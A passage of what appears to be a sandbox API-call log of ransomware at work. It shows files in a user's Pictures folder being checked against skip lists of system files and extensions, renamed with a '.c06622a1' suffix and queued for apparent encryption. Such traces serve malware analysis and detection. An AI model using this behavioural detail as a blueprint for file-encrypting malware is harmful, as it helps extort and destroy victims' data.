BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L") returned 0x4e [0167.519] wcscpy (in: _Dest=0x32a212e, _Source="1TRsqcrEatY3P2 xj.jpg" | out: _Dest="1TRsqcrEatY3P2 xj.jpg") returned="1TRsqcrEatY3P2 xj.jpg" [0167.519] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\1TRsqcrEatY3P2 xj.jpg", dwFileAttributes=0x80) returned 1 [0167.520] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\1TRsqcrEatY3P2 xj.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\1trsqcreaty3p2 xj.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0167.520] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.520] ReadFile (in: hFile=0x1b0, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0167.521] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x97d09a36 [0167.521] RtlComputeCrc32 (PartialCrc=0x9a36, Buffer=0x32e4a4, Length=0x80) returned 0xc119b614 [0167.521] RtlComputeCrc32 (PartialCrc=0xb614, Buffer=0x32e4a4, Length=0x80) returned 0x1bd18916 [0167.567] RtlComputeCrc32 (PartialCrc=0x8916, Buffer=0x32e4a4, Length=0x80) returned 0x28f05c66 [0167.567] RtlComputeCrc32 (PartialCrc=0x5c66, Buffer=0x32e4a4, Length=0x80) returned 0x89b42813 [0167.567] CloseHandle (hObject=0x1b0) returned 1 [0167.567] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b2098 [0167.568] wcscpy (in: _Dest=0x32b2098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\1TRsqcrEatY3P2 xj.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\1TRsqcrEatY3P2 xj.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\1TRsqcrEatY3P2 xj.jpg" [0167.568] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\1TRsqcrEatY3P2 xj.jpg") returned 0x64 [0167.568] wcscpy (in: _Dest=0x32b2160, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.568] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\1TRsqcrEatY3P2 xj.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\1trsqcreaty3p2 xj.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\1TRsqcrEatY3P2 xj.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\1trsqcreaty3p2 xj.jpg.c06622a1"), dwFlags=0x8) returned 1 [0167.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\1TRsqcrEatY3P2 xj.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\1trsqcreaty3p2 xj.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1b0 [0167.572] CreateIoCompletionPort (FileHandle=0x1b0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0167.572] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0167.579] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5ddd64bd [0167.579] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6b1fc034 [0167.579] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x54ff47b3 [0167.579] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x239af537 [0167.579] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xdf8b17d [0167.579] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x16ab3eeb [0167.579] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4d635918 [0167.579] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x27add58f [0167.582] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x391a8af9 [0167.582] RtlComputeCrc32 (PartialCrc=0x8af9, Buffer=0x710094, Length=0x80) returned 0x788e502c [0167.582] RtlComputeCrc32 (PartialCrc=0x502c, Buffer=0x710094, Length=0x80) returned 0x3608c59f [0167.582] RtlComputeCrc32 (PartialCrc=0xc59f, Buffer=0x710094, Length=0x80) returned 0x94a87538 [0167.582] RtlComputeCrc32 (PartialCrc=0x7538, Buffer=0x710094, Length=0x80) returned 0x4b48ec50 [0167.582] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0167.582] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a2090) returned 1 [0167.582] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b2098) returned 1 [0167.582] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309e81d0, ftCreationTime.dwHighDateTime=0x1d5e4dc, ftLastAccessTime.dwLowDateTime=0xd04fdd90, ftLastAccessTime.dwHighDateTime=0x1d5e55a, ftLastWriteTime.dwLowDateTime=0xd04fdd90, ftLastWriteTime.dwHighDateTime=0x1d5e55a, nFileSizeHigh=0x0, nFileSizeLow=0x15e53, dwReserved0=0x0, dwReserved1=0x0, cFileName="9QMMz.gif", cAlternateFileName="")) returned 1 [0167.582] _wcsicmp (_Str1="9QMMz.gif", _Str2="README.c06622a1.TXT") returned -57 [0167.582] wcsstr (_Str="9QMMz.gif", _SubStr="README") returned 0x0 [0167.582] _wcsicmp (_Str1="autorun.inf", _Str2="9QMMz.gif") returned 40 [0167.582] wcslen (_String="autorun.inf") returned 0xb [0167.582] _wcsicmp (_Str1="boot.ini", _Str2="9QMMz.gif") returned 41 [0167.583] wcslen (_String="boot.ini") returned 0x8 [0167.583] _wcsicmp (_Str1="bootfont.bin", _Str2="9QMMz.gif") returned 41 [0167.583] wcslen (_String="bootfont.bin") returned 0xc [0167.583] _wcsicmp (_Str1="bootsect.bak", _Str2="9QMMz.gif") returned 41 [0167.583] wcslen (_String="bootsect.bak") returned 0xc [0167.583] _wcsicmp (_Str1="desktop.ini", _Str2="9QMMz.gif") returned 43 [0167.583] wcslen (_String="desktop.ini") returned 0xb [0167.583] _wcsicmp (_Str1="iconcache.db", _Str2="9QMMz.gif") returned 48 [0167.583] wcslen (_String="iconcache.db") returned 0xc [0167.583] _wcsicmp (_Str1="ntldr", _Str2="9QMMz.gif") returned 53 [0167.583] wcslen (_String="ntldr") returned 0x5 [0167.583] _wcsicmp (_Str1="ntuser.dat", _Str2="9QMMz.gif") returned 53 [0167.583] wcslen (_String="ntuser.dat") returned 0xa [0167.583] _wcsicmp (_Str1="ntuser.dat.log", _Str2="9QMMz.gif") returned 53 [0167.583] wcslen (_String="ntuser.dat.log") returned 0xe [0167.583] _wcsicmp (_Str1="ntuser.ini", _Str2="9QMMz.gif") returned 53 [0167.583] wcslen (_String="ntuser.ini") returned 0xa [0167.583] _wcsicmp (_Str1="thumbs.db", _Str2="9QMMz.gif") returned 59 [0167.583] wcslen (_String="thumbs.db") returned 0x9 [0167.583] _wcsicmp (_Str1="386", _Str2="gif") returned -52 [0167.583] wcslen (_String="386") returned 0x3 [0167.583] _wcsicmp (_Str1="adv", _Str2="gif") returned -6 [0167.583] wcslen (_String="adv") returned 0x3 [0167.583] _wcsicmp (_Str1="ani", _Str2="gif") returned -6 [0167.583] wcslen (_String="ani") returned 0x3 [0167.583] _wcsicmp (_Str1="bat", _Str2="gif") returned -5 [0167.583] wcslen (_String="bat") returned 0x3 [0167.583] _wcsicmp (_Str1="bin", _Str2="gif") returned -5 [0167.583] wcslen (_String="bin") returned 0x3 [0167.584] _wcsicmp (_Str1="cab", _Str2="gif") returned -4 [0167.584] wcslen (_String="cab") returned 0x3 [0167.584] _wcsicmp (_Str1="cmd", _Str2="gif") returned -4 [0167.584] wcslen (_String="cmd") returned 0x3 [0167.584] _wcsicmp (_Str1="com", _Str2="gif") returned -4 [0167.584] wcslen (_String="com") returned 0x3 [0167.584] _wcsicmp (_Str1="cpl", _Str2="gif") returned -4 [0167.584] wcslen (_String="cpl") returned 0x3 [0167.584] _wcsicmp (_Str1="cur", _Str2="gif") returned -4 [0167.584] wcslen (_String="cur") returned 0x3 [0167.584] _wcsicmp (_Str1="deskthemepack", _Str2="gif") returned -3 [0167.584] wcslen (_String="deskthemepack") returned 0xd [0167.584] _wcsicmp (_Str1="diagcab", _Str2="gif") returned -3 [0167.584] wcslen (_String="diagcab") returned 0x7 [0167.584] _wcsicmp (_Str1="diagcfg", _Str2="gif") returned -3 [0167.584] wcslen (_String="diagcfg") returned 0x7 [0167.584] _wcsicmp (_Str1="diagpkg", _Str2="gif") returned -3 [0167.584] wcslen (_String="diagpkg") returned 0x7 [0167.584] _wcsicmp (_Str1="dll", _Str2="gif") returned -3 [0167.584] wcslen (_String="dll") returned 0x3 [0167.584] _wcsicmp (_Str1="drv", _Str2="gif") returned -3 [0167.584] wcslen (_String="drv") returned 0x3 [0167.584] _wcsicmp (_Str1="exe", _Str2="gif") returned -2 [0167.584] wcslen (_String="exe") returned 0x3 [0167.584] _wcsicmp (_Str1="hlp", _Str2="gif") returned 1 [0167.584] wcslen (_String="hlp") returned 0x3 [0167.584] _wcsicmp (_Str1="icl", _Str2="gif") returned 2 [0167.584] wcslen (_String="icl") returned 0x3 [0167.584] _wcsicmp (_Str1="icns", _Str2="gif") returned 2 [0167.584] wcslen (_String="icns") returned 0x4 [0167.584] _wcsicmp (_Str1="ico", _Str2="gif") returned 2 [0167.585] wcslen (_String="ico") returned 0x3 [0167.585] _wcsicmp (_Str1="ics", _Str2="gif") returned 2 [0167.585] wcslen (_String="ics") returned 0x3 [0167.585] _wcsicmp (_Str1="idx", _Str2="gif") returned 2 [0167.585] wcslen (_String="idx") returned 0x3 [0167.585] _wcsicmp (_Str1="ldf", _Str2="gif") returned 5 [0167.585] wcslen (_String="ldf") returned 0x3 [0167.585] _wcsicmp (_Str1="lnk", _Str2="gif") returned 5 [0167.585] wcslen (_String="lnk") returned 0x3 [0167.585] _wcsicmp (_Str1="mod", _Str2="gif") returned 6 [0167.585] wcslen (_String="mod") returned 0x3 [0167.585] _wcsicmp (_Str1="mpa", _Str2="gif") returned 6 [0167.585] wcslen (_String="mpa") returned 0x3 [0167.585] _wcsicmp (_Str1="msc", _Str2="gif") returned 6 [0167.585] wcslen (_String="msc") returned 0x3 [0167.585] _wcsicmp (_Str1="msp", _Str2="gif") returned 6 [0167.585] wcslen (_String="msp") returned 0x3 [0167.585] _wcsicmp (_Str1="msstyles", _Str2="gif") returned 6 [0167.585] wcslen (_String="msstyles") returned 0x8 [0167.585] _wcsicmp (_Str1="msu", _Str2="gif") returned 6 [0167.585] wcslen (_String="msu") returned 0x3 [0167.585] _wcsicmp (_Str1="nls", _Str2="gif") returned 7 [0167.585] wcslen (_String="nls") returned 0x3 [0167.585] _wcsicmp (_Str1="nomedia", _Str2="gif") returned 7 [0167.585] wcslen (_String="nomedia") returned 0x7 [0167.585] _wcsicmp (_Str1="ocx", _Str2="gif") returned 8 [0167.585] wcslen (_String="ocx") returned 0x3 [0167.585] _wcsicmp (_Str1="prf", _Str2="gif") returned 9 [0167.585] wcslen (_String="prf") returned 0x3 [0167.585] _wcsicmp (_Str1="ps1", _Str2="gif") returned 9 [0167.585] wcslen (_String="ps1") returned 0x3 [0167.585] _wcsicmp (_Str1="rom", _Str2="gif") returned 11 [0167.585] wcslen (_String="rom") returned 0x3 [0167.586] _wcsicmp (_Str1="rtp", _Str2="gif") returned 11 [0167.586] wcslen (_String="rtp") returned 0x3 [0167.586] _wcsicmp (_Str1="scr", _Str2="gif") returned 12 [0167.586] wcslen (_String="scr") returned 0x3 [0167.586] _wcsicmp (_Str1="shs", _Str2="gif") returned 12 [0167.586] wcslen (_String="shs") returned 0x3 [0167.586] _wcsicmp (_Str1="spl", _Str2="gif") returned 12 [0167.586] wcslen (_String="spl") returned 0x3 [0167.586] _wcsicmp (_Str1="sys", _Str2="gif") returned 12 [0167.586] wcslen (_String="sys") returned 0x3 [0167.586] _wcsicmp (_Str1="theme", _Str2="gif") returned 13 [0167.586] wcslen (_String="theme") returned 0x5 [0167.586] _wcsicmp (_Str1="themepack", _Str2="gif") returned 13 [0167.586] wcslen (_String="themepack") returned 0x9 [0167.586] _wcsicmp (_Str1="wpx", _Str2="gif") returned 16 [0167.586] wcslen (_String="wpx") returned 0x3 [0167.586] _wcsicmp (_Str1="lock", _Str2="gif") returned 5 [0167.586] wcslen (_String="lock") returned 0x4 [0167.586] _wcsicmp (_Str1="key", _Str2="gif") returned 4 [0167.586] wcslen (_String="key") returned 0x3 [0167.586] _wcsicmp (_Str1="hta", _Str2="gif") returned 1 [0167.586] wcslen (_String="hta") returned 0x3 [0167.586] _wcsicmp (_Str1="msi", _Str2="gif") returned 6 [0167.586] wcslen (_String="msi") returned 0x3 [0167.586] _wcsicmp (_Str1="pdb", _Str2="gif") returned 9 [0167.586] wcslen (_String="pdb") returned 0x3 [0167.586] _wcsicmp (_Str1="sqlite", _Str2="gif") returned 12 [0167.586] wcslen (_String="sqlite") returned 0x6 [0167.586] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l")) returned 0x10 [0167.586] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a2090 [0167.587] wcscpy (in: _Dest=0x32a2090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L" [0167.587] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L") returned 0x4e [0167.587] wcscpy (in: _Dest=0x32a212e, _Source="9QMMz.gif" | out: _Dest="9QMMz.gif") returned="9QMMz.gif" [0167.587] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\9QMMz.gif", dwFileAttributes=0x80) returned 1 [0167.587] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\9QMMz.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\9qmmz.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d0 [0167.587] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.587] ReadFile (in: hFile=0x1d0, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0167.588] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0xb07095ae [0167.588] RtlComputeCrc32 (PartialCrc=0x95ae, Buffer=0x32e4a4, Length=0x80) returned 0xc1734aa4 [0167.588] RtlComputeCrc32 (PartialCrc=0x4aa4, Buffer=0x32e4a4, Length=0x80) returned 0xdb8afc4b [0167.588] RtlComputeCrc32 (PartialCrc=0xfc4b, Buffer=0x32e4a4, Length=0x80) returned 0x23db6f34 [0167.588] RtlComputeCrc32 (PartialCrc=0x6f34, Buffer=0x32e4a4, Length=0x80) returned 0xe1b76d4c [0167.588] CloseHandle (hObject=0x1d0) returned 1 [0167.588] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b2098 [0167.588] wcscpy (in: _Dest=0x32b2098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\9QMMz.gif" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\9QMMz.gif") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\9QMMz.gif" [0167.588] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\9QMMz.gif") returned 0x58 [0167.588] wcscpy (in: _Dest=0x32b2148, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.588] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\9QMMz.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\9qmmz.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\9QMMz.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\9qmmz.gif.c06622a1"), dwFlags=0x8) returned 1 [0167.590] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\ry57L\\9QMMz.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\ry57l\\9qmmz.gif.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d0 [0167.591] CreateIoCompletionPort (FileHandle=0x1d0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0167.591] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0167.599] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x689f4832 [0167.599] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5ce8d8a6 [0167.599] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2255828f [0167.599] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4165b568 [0167.607] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4f3abb73 [0167.607] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2ec0a653 [0167.607] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x9271fb0 [0167.607] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1f79d534 [0167.610] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0x962a4f1e [0167.610] RtlComputeCrc32 (PartialCrc=0x4f1e, Buffer=0x2690094, Length=0x80) returned 0x70a38a08 [0167.610] RtlComputeCrc32 (PartialCrc=0x8a08, Buffer=0x2690094, Length=0x80) returned 0x6b0b3019 [0167.610] RtlComputeCrc32 (PartialCrc=0x3019, Buffer=0x2690094, Length=0x80) returned 0xb84ad804 [0167.610] RtlComputeCrc32 (PartialCrc=0xd804, Buffer=0x2690094, Length=0x80) returned 0x826f5f73 [0167.610] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0167.610] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a2090) returned 1 [0167.610] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b2098) returned 1 [0167.610] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79679130, ftCreationTime.dwHighDateTime=0x1d5e000, ftLastAccessTime.dwLowDateTime=0xb1f2f0d0, ftLastAccessTime.dwHighDateTime=0x1d5da38, ftLastWriteTime.dwLowDateTime=0xb1f2f0d0, ftLastWriteTime.dwHighDateTime=0x1d5da38, nFileSizeHigh=0x0, nFileSizeLow=0x1767e, dwReserved0=0x0, dwReserved1=0x0, cFileName="aBEfoYUIJCal0VU4J.jpg", cAlternateFileName="ABEFOY~1.JPG")) returned 1 [0167.611] _wcsicmp (_Str1="aBEfoYUIJCal0VU4J.jpg", _Str2="README.c06622a1.TXT") returned -17 [0167.611] wcsstr (_Str="aBEfoYUIJCal0VU4J.jpg", _SubStr="README") returned 0x0 [0167.611] _wcsicmp (_Str1="autorun.inf", _Str2="aBEfoYUIJCal0VU4J.jpg") returned 19 [0167.611] wcslen (_String="autorun.inf") returned 0xb [0167.611] _wcsicmp (_Str1="boot.ini", _Str2="aBEfoYUIJCal0VU4J.jpg") returned 1 [0167.611] wcslen (_String="boot.ini") returned 0x8 [0167.611] _wcsicmp (_Str1="bootfont.bin", _Str2="aBEfoYUIJCal0VU4J.jpg") returned 1 [0167.611] wcslen (_String="bootfont.bin") returned 0xc [0167.611] _wcsicmp (_Str1="bootsect.bak", _Str2="aBEfoYUIJCal0VU4J.jpg") returned 1 [0167.611] wcslen (_String="bootsect.bak") returned 0xc [0167.611] _wcsicmp (_Str1="desktop.ini", _Str2="aBEfoYUIJCal0VU4J.jpg") returned 3 [0167.611] wcslen (_String="desktop.ini") returned 0xb [0167.611] _wcsicmp (_Str1="iconcache.db", _Str2="aBEfoYUIJCal0VU4J.jpg") returned 8 [0167.611] wcslen (_String="iconcache.db") returned 0xc [0167.611] _wcsicmp (_Str1="ntldr", _Str2="aBEfoYUIJCal0VU4J.jpg") returned 13 [0167.611] wcslen (_String="ntldr") returned 0x5 [0167.611] _wcsicmp (_Str1="ntuser.dat", _Str2="aBEfoYUIJCal0VU4J.jpg") returned 13 [0167.611] wcslen (_String="ntuser.dat") returned 0xa [0167.611] _wcsicmp (_Str1="ntuser.dat.log", _Str2="aBEfoYUIJCal0VU4J.jpg") returned 13 [0167.611] wcslen (_String="ntuser.dat.log") returned 0xe [0167.611] _wcsicmp (_Str1="ntuser.ini", _Str2="aBEfoYUIJCal0VU4J.jpg") returned 13 [0167.611] wcslen (_String="ntuser.ini") returned 0xa [0167.611] _wcsicmp (_Str1="thumbs.db", _Str2="aBEfoYUIJCal0VU4J.jpg") returned 19 [0167.611] wcslen (_String="thumbs.db") returned 0x9 [0167.611] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0167.611] wcslen (_String="386") returned 0x3 [0167.611] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0167.611] wcslen (_String="adv") returned 0x3 [0167.611] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0167.611] wcslen (_String="ani") returned 0x3 [0167.611] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0167.612] wcslen (_String="bat") returned 0x3 [0167.612] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0167.612] wcslen (_String="bin") returned 0x3 [0167.612] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0167.612] wcslen (_String="cab") returned 0x3 [0167.612] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0167.612] wcslen (_String="cmd") returned 0x3 [0167.612] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0167.612] wcslen (_String="com") returned 0x3 [0167.612] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0167.612] wcslen (_String="cpl") returned 0x3 [0167.612] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0167.612] wcslen (_String="cur") returned 0x3 [0167.612] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0167.612] wcslen (_String="deskthemepack") returned 0xd [0167.612] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0167.612] wcslen (_String="diagcab") returned 0x7 [0167.612] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0167.612] wcslen (_String="diagcfg") returned 0x7 [0167.612] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0167.612] wcslen (_String="diagpkg") returned 0x7 [0167.612] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0167.612] wcslen (_String="dll") returned 0x3 [0167.612] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0167.612] wcslen (_String="drv") returned 0x3 [0167.612] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0167.612] wcslen (_String="exe") returned 0x3 [0167.612] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0167.612] wcslen (_String="hlp") returned 0x3 [0167.612] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0167.612] wcslen (_String="icl") returned 0x3 [0167.612] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0167.612] wcslen (_String="icns") returned 0x4 [0167.613] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0167.613] wcslen (_String="ico") returned 0x3 [0167.613] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0167.613] wcslen (_String="ics") returned 0x3 [0167.613] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0167.613] wcslen (_String="idx") returned 0x3 [0167.613] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0167.613] wcslen (_String="ldf") returned 0x3 [0167.613] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0167.613] wcslen (_String="lnk") returned 0x3 [0167.613] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0167.613] wcslen (_String="mod") returned 0x3 [0167.613] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0167.613] wcslen (_String="mpa") returned 0x3 [0167.613] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0167.613] wcslen (_String="msc") returned 0x3 [0167.613] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0167.613] wcslen (_String="msp") returned 0x3 [0167.613] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0167.613] wcslen (_String="msstyles") returned 0x8 [0167.613] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0167.613] 